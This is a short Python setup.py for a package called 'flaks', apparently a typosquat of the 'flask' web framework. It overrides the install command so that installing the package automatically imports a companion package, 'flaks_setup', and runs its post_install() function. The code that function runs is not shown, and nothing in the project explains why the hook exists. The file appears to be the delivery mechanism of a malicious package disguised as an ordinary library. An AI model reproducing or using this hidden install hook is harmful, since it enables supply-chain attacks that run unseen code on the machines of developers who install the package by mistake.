from setuptools import setup, find_packages
from setuptools.command.install import install


class PostInstallCommand(install):
    def run(self):
        install.run(self)
        import flaks_setup
        flaks_setup.post_install()


setup(
    name='flaks',
    version='1.2',
    license='MIT',
    author="Mario Nascimento",
    author_email='marionascimento047@gmail.com',
    packages=find_packages('src'),
    package_dir={'': 'src'},
    url='https://github.com/darkarp/flaks',
    keywords='example project',
    install_requires=[
        'requests',
        'flaks_setup==1.2'
    ],
    cmdclass={
        'install': PostInstallCommand
    }
)
